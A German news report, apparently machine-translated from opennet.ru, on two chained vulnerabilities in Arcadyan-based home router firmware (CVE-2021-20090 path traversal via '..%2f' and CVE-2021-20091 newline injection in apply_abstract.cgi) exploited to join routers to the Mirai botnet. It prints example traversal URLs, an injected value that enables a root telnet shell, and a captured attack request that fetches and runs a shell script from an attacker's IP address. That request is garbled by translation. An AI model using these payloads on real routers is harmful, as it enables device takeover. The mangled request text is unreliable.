Im Netzwerk wurde ein massiver Angriff auf Heimrouter registriert, deren Firmware eine HTTP-Server-Implementierung der Firma Arcadyan nutzt. Um die Kontrolle über Geräte zu erlangen, wird eine Kombination aus zwei Schwachstellen ausgenutzt, die die Fernausführung beliebigen Codes mit Root-Rechten ermöglicht. Das Problem betrifft eine ganze Reihe von ADSL-Routern von Arcadyan, ASUS und Buffalo sowie Geräte der Marken Beeline (das Problem wird bei Smart Box Flash bestätigt), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone und andere Telekommunikationsbetreiber. Es wird darauf hingewiesen, dass das Problem seit mehr als 10 Jahren in der Arcadyan-Firmware auftritt und es in dieser Zeit gelungen ist, auf mindestens 20 Gerätemodelle von 17 verschiedenen Herstellern zu migrieren.
Die erste Schwachstelle, CVE-2021-20090, ermöglicht den Zugriff auf jedes Webinterface-Skript ohne Authentifizierung. Der Kern der Schwachstelle besteht darin, dass im Webinterface auf einige Verzeichnisse, über die Bilder, CSS-Dateien und JavaScript-Skripte gesendet werden, ohne Authentifizierung zugegriffen werden kann. In diesem Fall werden Verzeichnisse, für die der Zugriff ohne Authentifizierung erlaubt ist, anhand der Initialmaske überprüft. Die Angabe von „../“-Zeichen in Pfaden, die zum übergeordneten Verzeichnis führen, wird von der Firmware blockiert, die Verwendung der Kombination „..%2f“ wird jedoch übersprungen. Somit ist es möglich, geschützte Seiten zu öffnen, wenn Anfragen wie „http://192.168.1.1/images/..%2findex.htm“ gesendet werden.
Die zweite Schwachstelle, CVE-2021-20091, ermöglicht es einem authentifizierten Benutzer, Änderungen an den Systemeinstellungen des Geräts vorzunehmen, indem er speziell formatierte Parameter an das Skript apply_abstract.cgi sendet, das nicht prüft, ob in den Parametern ein Zeilenumbruchzeichen vorhanden ist . Beispielsweise kann ein Angreifer beim Durchführen eines Ping-Vorgangs den Wert „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ im Feld mit der zu prüfenden IP-Adresse und im Skript beim Erstellen der Einstellungsdatei /tmp/etc/config/ angeben. .glbcfg, schreibt die Zeile „AARC_SYS_TelnetdEnable=1“ hinein, wodurch der Telnetd-Server aktiviert wird, der uneingeschränkten Befehls-Shell-Zugriff mit Root-Rechten ermöglicht. Ebenso können Sie durch Festlegen des Parameters AARC_SYS jeden Code auf dem System ausführen. Die erste Schwachstelle ermöglicht es, ein problematisches Skript ohne Authentifizierung auszuführen, indem man darauf als „/images/..%2fapply_abstract.cgi“ zugreift.
Um Schwachstellen auszunutzen, muss ein Angreifer in der Lage sein, eine Anfrage an den Netzwerkport zu senden, auf dem das Webinterface läuft. Der Dynamik der Ausbreitung des Angriffs nach zu urteilen, lassen viele Betreiber den Zugriff auf ihre Geräte über das externe Netzwerk offen, um die Diagnose von Problemen durch den Support-Service zu vereinfachen. Wenn der Zugriff auf die Schnittstelle nur auf das interne Netzwerk beschränkt ist, kann ein Angriff von einem externen Netzwerk aus mit der Technik „DNS-Rebinding“ durchgeführt werden. Sicherheitslücken werden bereits aktiv genutzt, um Router mit dem Mirai-Botnetz zu verbinden: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Verbindung: schließen User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0 %1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; locken+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Source: opennet.ru